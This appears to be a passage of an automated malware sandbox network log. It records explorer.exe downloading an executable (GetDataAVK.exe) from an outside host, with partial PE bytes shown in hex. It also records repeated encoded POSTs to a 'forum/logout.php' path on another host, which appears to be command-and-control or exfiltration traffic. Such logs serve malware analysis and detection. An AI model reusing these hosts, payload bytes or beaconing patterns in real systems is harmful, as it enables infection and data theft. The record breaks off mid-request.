36 61 36 32 36 35 34 39 64 64 31 65 63 62 37 32 34 65 36 62 66 33 66 31 63 31 32 61 38 62 38 34 64 32 66 32 39 62 31 32 31 35 35 61 30 62 38 33 31 32 37 32 31 63 61 61 39 35 37 36 30 66 36 61 32 33 32 61 32 32 30 32 33 37 36 62 63 37 63 65 33 64 66 63 61 63 32 33 64 64 62 35 35 31 62 33 66 33 34 31 64 30 30 66 33 30 65 66 66 65 39 62 36 36 61 35 61 66 31 33 38 35 37 64 65 33 62 37 39 61 37 37 34 30 32 63 34 38 66 35 65 63 35 61 31 61 31 30 31 63 37 32 39 63 61 63 39 30 61 33 34 36 38 30 34 39 63 61 64 39 35 65 38 35 38 37 35 32 33 32 65 64 34 35 34 35 33 32 65 32 31 30 36 33 65 31 66 64 34 32 33 63 66 33 36 32 39 33 35 39 64 30 65 38 65 65 37 32 66 35 31 32 38 62 65 37 34 61 63 33 62 39 35 35 Data Ascii: fqbgr=A0D69985BD0D9E6D22CE2C5BF94BFFA1E667F37F4D774A8F86D5CF&dmvyhqzcl=20002475&huhobob=bbe7e9fe589105302b4c198337d7e0d17c4891b47da0287a0558095e08dbe626ef15379b9560b82740e893f1f5fca9e0d4ed0cb331aaba87f1cef544dfd2a1b59a69cbfa589213a11c61986e94142153cc99fca5db44af48aef7e0e06e4447a331a7b203a8b23af57a5b8841b2dcb871d77dea3ae944effe9d3291225c249285aa31fb59f9c96367679637de4b9ff0cb475f3b5d76e7a5f145d610daaca58c7216223a4d55d6a66288c451aa979b7e6a626549dd1ecb724e6bf3f1c12a8b84d2f29b12155a0b8312721caa95760f6a232a2202376bc7ce3dfcac23ddb551b3f341d00f30effe9b66a5af13857de3b79a77402c48f5ec5a1a101c729cac90a3468049cad95e85875232ed454532e21063e1fd423cf3629359d0e8ee72f5128be74ac3b955
Mar 10, 2021 11:43:49.483335018 CET	10186	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a 41 8f 16 19 82 1b 9c 41 c6 5a af 02 7f 6d 7d 8a 98 f5 1d 9d d9 66 7f ad 12 07 38 99 6b af dd eb aa 3c ca 8c de c9 be 7f 9c 78 b1 41 5d 97 a5 36 f3 99 bf 99 0f b8 a9 d7 f0 1d ce ea a5 2d b9 13 9e a6 07 91 4c de 6c 18 80 87 81 aa 27 5f ab d8 33 b3 b7 04 9d 8b ea 6d f7 99 9c 45 70 a7 22 0b 79 cd 04 45 48 30 90 83 c6 92 b8 8f 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6dAAZm}f8k<xA]6-Ll'_3mEp"yEH00

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49719	8.210.47.214	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:42:34.206296921 CET	1224	OUT	GET /old/GetDataAVK.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: estrelladamm.icu Cache-Control: no-cache
Mar 10, 2021 11:42:34.481314898 CET	1226	IN	HTTP/1.1 200 OK Date: Wed, 10 Mar 2021 10:42:34 GMT Server: Apache Last-Modified: Wed, 10 Mar 2021 05:36:15 GMT Accept-Ranges: bytes Content-Length: 680448 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee 58 48 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 58 0a 00 00 08 00 00 00 00 00 00 ce 76 0a 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0a 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 76 0a 00 57 00 00 00 00 80 0a 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0a 00 0c 00 00 00 c4 75 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 56 0a 00 00 20 00 00 00 58 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 80 0a 00 00 06 00 00 00 5a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0a 00 00 02 00 00 00 60 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 76 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 18 a4 09 00 ac d1 00 00 03 00 00 00 c1 01 00 06 a8 95 00 00 70 0e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 e1 01 00 06 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 4a 02 04 28 03 00 00 0a 00 00 02 03 28 03 00 00 06 00 2a 00 13 30 02 00 0d 00 00 00 01 00 00 11 00 02 03 73 04 00 00 06 0a 2b 00 06 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 36 02 03 04 14 14 28 09 00 00 06 00 00 2a 13 30 04 00 4c 00 00 00 02 00 00 11 73 0d 00 00 06 0a 06 0e 04 7d 03 00 00 04 02 03 04 28 04 00 00 06 00 00 05 2c 0b 06 7b 03 00 00 04 14 fe 03 2b 01 16 0b 07 2c 20 00 02 05 6f 95 00 00 06 06 fe 06 0e 00 00 06 73 04 00 00 0a 28 01 00 00 2b 28 07 00 00 06 00 00 2a 13 30 02 00 0d 00 00 00 03 00 00 11 00 02 03 73 08 00 00 06 0a 2b 00 06 2a 00 00 00 13 30 04 00 0f 00 00 00 03 00 00 11 00 02 03 04 05 73 09 00 00 06 0a 2b 00 06 2a 00 13 30 04 00 19 00 00 00 03 00 00 11 00 02 6f 02 00 00 06 02 6f 06 00 00 0a 03 04 73 09 00 00 06 0a 2b 00 06 2a 22 02 28 07 00 00 0a 00 2a 6e 03 6f b5 00 00 06 2d 11 03 02 7b 03 00 00 04 6f bb 00 00 06 14 fe 01 2b 01 16 2a 1e 02 7b 1e 00 00 04 2a 22 02 03 7d 1e 00 00 04 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 20 00 00 04 2a 1e 02 7b 21 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 22 00 00 04 2a 22 02 03 7d 22 00 00 04 2a 1e 02 7b 23 00 00 04 2a 22 02 03 7d 23 00 00 04 2a 32 02 03 1c 04 28 1a 00 00 06 00 00 2a 13 30 04 00 c2 00 00 00 04 00 00 11 02 14 7d 18 00 00 04 02 14 7d 19 00 00 04 02 16 6a 7d 1b 00 00 04 02 16 7d 1c 00 00 04 02 73 09 00 00 0a 7d 1d 00 00 04 02 28 07 00 00 0a 00 00 03 28 0a 00 00 0a 0d 09 2c 10 72 01 00 00 70 72 25 00 00 70 73 0b 00 00 0a 7a 02 03 28 12 00 00 06 00 02 28 11 00 00 06 28 1d 00 00 06 0b 07 12 00 04 7e 0c 00 00 0a 28 2e 01 00 06 0c 02 06 28 10 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELXH`0Xv @ @tvWu H.textV X `.rsrcZ@@.reloc`@BvHp({"}J((0s+{"}6(0Ls}(,{+, os(+(0s+0s+0oos+"(no-{o+{"}{ "} {!"}!{""}"{#"}#2(*0}}j}}s}((,rpr%psz(((~(.(

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.5	49763	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:52.245745897 CET	10188	OUT	POST /forum/logout.php?id=2442663 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 659 Cache-Control: no-cache Data Raw: 6d 79 6b 77 69 75 67 73 3d 37 34 38 34 37 38 36 36 38 64 34 35 66 66 39 37 38 38 38 38 66 61 61 30 38 34 34 62 63 34 39 65 34 34 62 38 63 38 30 35 64 39 32 63 26 6b 75 65 6f 79 69 3d 31 35 32 36 34 30 36 32 26 6f 63 71 65 3d 33 64 36 34 36 38 34 62 35 66 65 34 66 66 65 65 31 64 61 61 62 36 63 33 63 36 66 39 37 35 65 37 32 61 36 32 31 39 36 34 39 63 34 35 66 33 61 39 39 34 32 63 37 39 34 64 32 32 63 63 35 36 65 33 36 66 61 34 33 61 65 33 32 63 37 36 39 61 32 31 37 39 63 35 33 37 61 31 39 63 63 36 38 62 34 33 64 31 64 38 30 64 63 34 38 33 33 61 65 33 62 32 31 39 39 30 34 39 66 39 31 62 38 66 38 35 65 35 62 35 39 30 34 31 31 63 39 31 62 63 61 62 39 64 38 34 30 63 37 31 34 36 37 66 35 65 66 31 30 39 38 33 39 30 31 33 35 61 63 62 36 31 66 37 31 66 61 36 39 32 62 62 36 37 63 38 62 62 66 33 63 63 37 32 63 37 65 38 37 66 61 64 39 64 36 35 65 34 35 39 36 66 62 63 37 62 38 64 38 37 32 63 66 38 30 63 66 66 63 38 31 65 36 32 65 65 35 35 35 33 66 37 37 61 38 61 62 32 32 33 31 63 35 39 64 37 35 38 39 35 62 31 36 61 31 65 31 64 34 34 38 31 37 36 31 65 63 64 34 35 34 39 37 31 37 61 64 34 62 39 61 36 36 65 31 65 31 37 64 61 30 62 30 65 65 30 37 34 30 65 33 61 38 38 65 30 33 34 32 31 30 61 63 62 30 64 31 33 64 30 36 35 62 62 61 39 35 37 65 37 39 66 37 34 61 63 62 35 38 37 63 63 37 33 32 32 66 65 36 62 62 30 36 33 31 34 38 32 61 32 39 61 34 34 36 61 34 36 65 31 33 64 32 61 66 30 61 38 32 64 31 32 39 63 31 66 35 64 31 34 32 62 61 61 64 38 38 64 31 30 34 65 66 66 66 34 39 35 65 39 39 65 62 38 33 65 39 33 61 35 37 31 31 61 34 38 65 38 65 62 38 65 66 36 34 35 66 65 37 34 63 37 36 30 36 65 31 61 34 65 34 36 35 35 37 36 63 31 37 32 36 30 35 63 31 31 35 62 38 34 62 39 66 65 39 34 63 64 35 32 65 33 64 33 31 63 36 34 36 36 64 33 64 63 39 30 38 30 36 33 38 66 66 62 30 33 66 30 33 66 66 63 64 66 33 65 37 35 62 35 65 62 30 62 30 30 30 32 37 64 63 30 39 32 34 39 33 65 63 62 66 65 39 61 65 34 62 62 39 37 37 38 64 35 32 35 30 61 61 66 63 36 30 37 39 35 66 31 31 30 31 30 32 39 Data Ascii: mykwiugs=748478668d45ff978888faa0844bc49e44b8c805d92c&kueoyi=15264062&ocqe=3d64684b5fe4ffee1daab6c3c6f975e72a6219649c45f3a9942c794d22cc56e36fa43ae32c769a2179c537a19cc68b43d1d80dc4833ae3b2199049f91b8f85e5b590411c91bcab9d840c71467f5ef1098390135acb61f71fa692bb67c8bbf3cc72c7e87fad9d65e4596fbc7b8d872cf80cffc81e62ee5553f77a8ab2231c59d75895b16a1e1d4481761ecd4549717ad4b9a66e1e17da0b0ee0740e3a88e034210acb0d13d065bba957e79f74acb587cc7322fe6bb0631482a29a446a46e13d2af0a82d129c1f5d142baad88d104efff495e99eb83e93a5711a48e8eb8ef645fe74c7606e1a4e465576c172605c115b84b9fe94cd52e3d31c6466d3dc9080638ffb03f03ffcdf3e75b5eb0b00027dc092493ecbfe9ae4bb9778d5250aafc60795f1101029
Mar 10, 2021 11:43:52.322666883 CET	10188	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a db ab 96 43 cd 27 ee 46 10 6a 6a 71 83 d9 64 74 63 ac f3 7d 87 d6 d0 58 3e c4 87 63 47 73 47 91 70 46 6f e7 ae d5 41 d5 93 f3 67 9f a2 28 5f 72 88 f0 b8 3f f0 ed ef 44 03 a7 9d d6 28 23 b2 9d 8a 75 14 02 1d cf 2a 7c 9d d8 df f7 39 8d 1c fe ca ef 09 c5 61 3d 24 d4 ff a4 7a 98 f2 e8 25 2d f2 39 39 5c eb fa f8 85 ce 00 d3 5f 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6dC'Fjjqdtc}X>cGsGpFoAg(_r?D(#u*\|9a=$z%-99\_0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.5	49764	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:55.078284025 CET	10190	OUT	POST /forum/logout.php?id=7086675 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 633 Cache-Control: no-cache Data Raw: 69 77 65 73 67 6f 63 71 3d 38 35 32 38 31 39 33 34 26 6b 61 6b 61 3d 37 33 65 62 32 63 64 65 62 62 63 63 33 36 62 62 30 37 26 6d 65 71 69 61 6d 3d 33 33 31 65 33 65 30 33 37 39 32 35 35 34 31 31 65 31 35 66 66 37 32 30 36 63 66 30 31 37 32 65 39 36 33 39 36 32 37 30 32 35 35 38 36 39 39 34 35 38 33 36 35 31 61 31 30 36 64 31 66 37 61 65 63 38 63 32 61 37 63 34 63 30 38 38 34 35 61 35 37 38 38 33 65 34 31 30 30 32 66 65 61 31 34 35 31 62 36 35 31 62 36 35 31 31 63 35 33 65 66 34 63 61 61 62 33 65 35 33 35 62 34 32 66 31 38 63 37 31 33 65 64 63 36 63 66 62 63 37 64 66 34 65 65 34 64 34 64 34 30 31 64 37 30 35 30 32 31 62 30 61 30 66 31 36 34 66 32 32 62 63 37 35 62 31 37 34 36 64 30 35 35 66 61 63 30 61 38 61 65 61 38 39 63 64 36 36 63 64 36 66 33 32 63 37 38 31 65 65 30 61 34 37 64 36 33 31 65 65 36 35 65 33 64 30 64 39 33 64 31 38 33 30 64 32 61 61 35 34 34 63 61 31 62 64 38 64 64 38 65 63 31 35 34 62 66 36 33 31 63 34 33 32 61 35 34 34 33 30 39 31 35 31 38 35 39 35 64 62 30 30 38 61 38 33 61 64 36 63 63 37 61 61 32 38 31 34 65 64 63 62 32 37 39 36 30 62 61 33 31 36 63 37 63 31 35 36 34 36 39 38 63 63 64 66 63 32 38 37 35 31 35 38 65 64 30 36 66 61 37 39 61 63 37 35 30 66 38 38 32 38 66 32 33 31 66 33 66 35 31 33 64 37 64 33 38 34 35 39 36 35 34 32 65 37 64 65 33 65 61 62 66 61 62 65 66 63 30 38 33 61 35 63 61 39 66 30 35 36 30 33 35 36 63 61 33 61 61 32 32 39 66 30 33 65 31 30 37 32 34 37 34 61 37 61 33 64 61 39 39 37 64 31 63 66 66 62 64 31 35 34 62 39 63 31 38 39 30 35 64 31 37 63 62 36 30 65 64 35 35 39 33 30 34 64 34 38 38 30 32 37 35 63 34 36 31 33 36 37 38 64 34 39 34 61 61 61 38 32 37 65 62 31 63 35 66 31 33 34 62 36 38 32 38 35 61 61 61 63 36 35 31 37 38 64 39 36 62 63 64 35 39 36 61 38 32 34 31 62 38 32 62 36 36 36 36 33 61 35 33 39 30 66 31 37 32 65 32 62 34 32 38 64 30 61 65 39 35 36 35 38 32 30 63 33 64 37 34 64 32 38 63 37 30 38 63 36 63 39 34 66 61 31 Data Ascii: iwesgocq=85281934&kaka=73eb2cdebbcc36bb07&meqiam=331e3e0379255411e15ff7206cf0172e9639627025586994583651a106d1f7aec8c2a7c4c08845a57883e41002fea1451b651b6511c53ef4caab3e535b42f18c713edc6cfbc7df4ee4d4d401d705021b0a0f164f22bc75b1746d055fac0a8aea89cd66cd6f32c781ee0a47d631ee65e3d0d93d1830d2aa544ca1bd8dd8ec154bf631c432a5443091518595db008a83ad6cc7aa2814edcb27960ba316c7c1564698ccdfc2875158ed06fa79ac750f8828f231f3f513d7d384596542e7de3eabfabefc083a5ca9f0560356ca3aa229f03e1072474a7a3da997d1cffbd154b9c18905d17cb60ed559304d4880275c4613678d494aaa827eb1c5f134b68285aaac65178d96bcd596a8241b82b66663a5390f172e2b428d0ae9565820c3d74d28c708c6c94fa1
Mar 10, 2021 11:43:55.147188902 CET	10190	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:44:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a 00 c5 07 3a 89 25 cb 45 b1 4c 07 c5 58 18 be 27 15 c8 3b 5f 14 d6 97 2e 84 39 ed 0e 16 6e a2 9d 8d b1 a5 71 40 3a 33 3b 55 87 83 c9 d4 5a 95 c3 37 d0 3b 03 22 60 e0 c3 46 6b 71 00 6d 11 a3 71 48 f1 d3 be 7b 2f ce 5f ad 3a b0 e2 d5 f1 a0 54 84 7c 8a bc 14 0d 60 b3 2f 20 09 f7 44 8d 4e 98 17 3a 37 4a b4 3b be 17 b0 37 d5 01 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d:%ELX';_.9nq@:3;UZ7;"`FkqmqH{/_:T\|`/ DN:7J;70

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49720	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:42:36.555608034 CET	1938	OUT	POST /forum/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 633 Cache-Control: no-cache Data Raw: 6c 63 6e 65 70 67 78 69 7a 3d 35 36 30 37 35 32 31 26 6e 67 74 6d 7a 3d 37 61 39 31 62 31 65 34 30 65 30 35 65 37 34 30 26 70 6b 7a 75 6a 65 7a 3d 30 39 39 46 35 36 30 44 33 35 41 43 34 38 44 46 34 46 36 42 39 44 46 38 44 38 45 45 33 44 30 38 45 42 41 44 45 34 41 36 42 45 41 45 37 32 32 38 39 37 37 32 30 45 33 43 30 38 46 31 36 34 31 38 37 43 42 38 44 34 39 35 42 34 43 31 32 34 32 34 35 37 30 45 34 33 43 45 34 38 36 36 31 42 45 38 30 39 39 37 46 30 42 46 31 31 32 32 32 32 41 32 41 45 32 36 30 36 42 42 34 39 44 31 36 44 35 32 38 41 34 42 35 45 30 37 36 37 33 43 44 33 34 43 37 32 42 43 37 45 33 30 46 39 33 34 39 44 35 36 32 42 42 41 35 36 41 30 45 34 45 35 35 32 42 44 35 37 39 41 46 45 30 30 37 46 33 39 45 34 45 46 34 39 39 45 34 42 41 41 30 41 46 39 44 33 33 37 45 35 34 41 32 46 41 44 34 33 38 35 30 33 31 39 42 46 34 31 44 42 33 37 32 34 37 45 46 38 41 32 35 36 34 41 36 41 34 32 42 46 38 38 39 32 44 34 33 42 33 41 41 30 30 32 32 37 44 43 41 30 42 35 42 46 30 42 39 39 35 39 34 46 46 46 41 37 34 44 34 43 39 38 34 38 45 36 33 41 36 39 45 46 46 33 39 32 46 44 42 43 31 39 38 33 45 39 31 30 30 46 39 33 46 35 36 44 37 37 35 30 38 33 41 32 36 39 44 44 39 43 46 33 36 44 44 44 33 38 36 42 30 36 46 34 45 37 37 38 39 39 37 34 45 30 32 31 30 45 43 38 36 32 44 36 37 45 33 31 30 44 36 42 46 46 32 43 36 39 38 43 46 39 36 41 46 32 45 32 32 41 36 46 35 42 31 37 30 36 39 41 39 30 35 44 43 34 37 41 38 45 36 39 34 42 45 41 46 37 31 35 38 45 35 32 45 32 37 44 37 30 41 41 41 38 42 37 41 31 46 42 32 44 39 46 43 38 45 37 46 35 44 43 32 42 31 33 45 36 41 39 33 45 33 39 36 45 37 42 42 35 43 37 44 45 38 38 39 38 31 38 35 35 45 36 45 44 41 33 37 43 34 34 36 41 34 37 45 37 34 30 45 41 46 33 41 45 32 46 33 43 30 43 42 32 38 31 30 33 32 42 43 41 30 30 45 30 45 37 39 32 45 35 46 45 33 31 33 46 31 39 32 45 37 34 36 39 39 30 37 39 41 36 46 35 43 43 45 32 44 43 46 33 43 31 34 46 45 38 43 34 44 35 31 30 Data Ascii: lcnepgxiz=5607521&ngtmz=7a91b1e40e05e740&pkzujez=099F560D35AC48DF4F6B9DF8D8EE3D08EBADE4A6BEAE722897720E3C08F164187CB8D495B4C12424570E43CE48661BE80997F0BF112222A2AE2606BB49D16D528A4B5E07673CD34C72BC7E30F9349D562BBA56A0E4E552BD579AFE007F39E4EF499E4BAA0AF9D337E54A2FAD43850319BF41DB37247EF8A2564A6A42BF8892D43B3AA00227DCA0B5BF0B99594FFFA74D4C9848E63A69EFF392FDBC1983E9100F93F56D775083A269DD9CF36DDD386B06F4E7789974E0210EC862D67E310D6BFF2C698CF96AF2E22A6F5B17069A905DC47A8E694BEAF7158E52E27D70AAA8B7A1FB2D9FC8E7F5DC2B13E6A93E396E7BB5C7DE88981855E6EDA37C446A47E740EAF3AE2F3C0CB281032BCA00E0E792E5FE313F192E74699079A6F5CCE2DCF3C14FE8C4D510
Mar 10, 2021 11:42:36.624667883 CET	1939	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:42:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a c9 b4 e9 0d a6 61 f5 53 a9 97 3c 8a d4 2e 04 dc fc 45 a4 e2 81 76 15 22 a5 7a f5 49 66 f8 91 7b 48 aa 4b 93 41 a3 6f f1 7e b7 80 d3 fc c3 a6 95 f8 73 bc 0c 00 51 23 ce a0 25 3b 37 a1 9d cc b5 63 e1 ea 1f 05 93 99 d0 2f 73 85 10 e1 58 ff 24 a3 1f ba 06 06 ea f3 a6 ed ee 89 9f b5 11 74 c0 21 ca 07 29 42 a9 f0 23 81 01 83 0f 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6daS<.Ev"zIf{HKAo~sQ#%;7c/sX$t!)B#0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49722	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:42:39.489584923 CET	1963	OUT	POST /forum/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 693 Cache-Control: no-cache Data Raw: 6d 79 6b 77 6f 61 3d 64 62 37 62 63 32 62 38 65 62 31 64 39 64 35 64 39 33 39 64 65 62 65 35 33 34 35 31 37 64 34 61 65 36 34 38 36 63 37 66 34 61 34 35 31 64 32 35 39 30 34 35 63 32 39 38 34 34 32 31 36 32 61 61 38 33 61 37 66 36 30 63 34 65 32 64 34 65 26 6b 75 65 6f 3d 36 30 38 34 37 33 36 32 26 6f 63 71 65 79 6d 61 6f 3d 30 34 61 64 35 64 32 62 38 64 66 34 38 64 39 33 65 39 38 63 64 64 38 32 63 65 33 35 38 34 64 62 30 65 61 61 64 38 38 39 63 65 66 34 61 62 33 31 37 39 36 32 32 36 32 37 38 34 32 63 62 31 31 65 35 37 32 65 33 63 30 66 30 37 63 38 39 65 30 36 62 63 64 31 35 30 63 34 32 35 61 65 64 39 61 39 64 35 63 36 32 62 32 35 36 65 39 37 34 30 32 33 34 62 38 30 64 61 35 30 32 61 31 65 34 36 65 30 64 65 34 63 35 64 34 30 63 32 36 31 39 38 35 32 35 35 64 39 33 39 39 65 62 66 35 39 36 38 63 63 35 34 64 39 62 30 35 37 35 65 35 36 66 39 30 62 37 65 35 35 31 33 39 62 32 30 62 66 64 64 33 61 63 62 64 64 36 61 34 36 39 31 32 36 30 33 37 36 63 31 64 62 34 65 30 39 35 34 35 65 39 33 33 39 62 35 37 39 39 37 32 39 65 66 66 37 39 35 64 34 65 61 63 36 33 61 38 33 35 38 39 32 66 63 37 39 37 33 39 34 34 61 64 30 32 35 61 33 31 37 39 39 36 63 30 34 32 34 65 66 63 64 39 36 65 30 62 61 37 31 65 39 35 34 37 66 65 64 32 35 34 64 38 33 66 38 30 34 30 63 63 36 35 39 33 31 35 35 30 30 61 63 35 61 30 36 36 61 35 35 30 63 64 36 64 33 30 30 30 34 30 39 62 38 36 31 63 64 39 37 64 36 62 30 65 63 65 37 32 35 33 39 37 66 33 30 38 61 34 31 32 39 36 33 36 33 66 36 39 39 65 30 63 34 39 63 61 32 33 65 31 34 62 39 38 35 31 65 30 66 64 37 36 35 33 36 31 35 34 61 64 66 32 35 63 63 39 66 63 31 31 31 30 61 33 63 34 37 35 37 66 34 64 37 30 32 30 38 33 30 31 34 66 61 39 30 62 35 35 63 65 39 61 33 38 39 62 38 64 63 62 65 37 36 33 33 62 37 31 37 61 31 64 35 64 66 32 61 31 39 31 38 31 36 64 39 39 66 31 38 30 63 61 34 66 62 64 64 66 33 35 38 62 31 30 66 39 36 34 37 63 37 37 63 62 65 38 33 31 30 62 64 34 61 30 32 65 31 39 30 63 32 35 62 36 64 36 62 61 66 38 30 38 36 63 66 32 34 65 66 39 66 39 36 66 34 35 31 39 32 66 36 65 63 35 30 31 31 32 34 38 35 30 33 64 38 61 32 61 32 61 30 35 30 Data Ascii: mykwoa=db7bc2b8eb1d9d5d939debe534517d4ae6486c7f4a451d259045c298442162aa83a7f60c4e2d4e&kueo=60847362&ocqeymao=04ad5d2b8df48d93e98cdd82ce3584db0eaad889cef4ab3179622627842cb11e572e3c0f07c89e06bcd150c425aed9a9d5c62b256e9740234b80da502a1e46e0de4c5d40c261985255d9399ebf5968cc54d9b0575e56f90b7e55139b20bfdd3acbdd6a4691260376c1db4e09545e9339b5799729eff795d4eac63a835892fc7973944ad025a317996c0424efcd96e0ba71e9547fed254d83f8040cc659315500ac5a066a550cd6d3000409b861cd97d6b0ece725397f308a41296363f699e0c49ca23e14b9851e0fd76536154adf25cc9fc1110a3c4757f4d702083014fa90b55ce9a389b8dcbe7633b717a1d5df2a191816d99f180ca4fbddf358b10f9647c77cbe8310bd4a02e190c25b6d6baf8086cf24ef9f96f45192f6ec5011248503d8a2a2a050
Mar 10, 2021 11:42:39.561311007 CET	1963	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:42:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a cc 5d 85 0b 05 18 23 2f ea e7 63 88 53 b8 05 b7 80 ef 94 08 27 65 61 4e ca f6 85 54 9d 1c 57 86 c6 89 0a 00 b8 d0 4d 35 26 e1 bc 33 d1 39 11 72 3d 57 4b 61 16 ed aa c6 1f 9d da 11 d7 16 70 52 82 9a c5 be a6 2c 08 ea 71 38 bb fe 50 37 32 32 bc 86 6d f1 cd 83 0a 1a 60 37 de b8 45 d3 6b f3 c3 85 18 68 db 5b 1f 7f 61 7e 8d 67 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d]#/cS'eaNTWM5&39r=WKapR,q8P722m`7Ekh[a~g0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49724	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:42:42.321046114 CET	1979	OUT	POST /forum/logout.php?id=1809723 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 664 Cache-Control: no-cache Data Raw: 78 75 72 6f 6c 3d 32 31 36 30 36 31 32 37 26 7a 79 78 77 76 75 74 3d 37 30 42 34 32 32 31 39 31 43 31 38 45 43 42 32 46 37 43 38 38 45 30 43 34 44 46 36 42 30 43 42 39 45 35 37 38 34 30 41 35 36 32 45 34 43 26 62 63 64 65 66 67 68 69 6a 3d 41 35 45 38 34 38 44 38 42 41 45 43 46 37 34 32 36 37 36 45 35 34 44 35 44 36 39 37 46 41 36 43 46 34 37 42 41 37 42 31 38 41 38 35 43 45 35 37 32 32 45 42 43 32 41 31 35 41 31 45 36 43 30 45 44 31 39 39 37 33 46 39 30 39 37 38 39 44 32 31 36 32 35 35 43 45 33 42 30 30 42 46 41 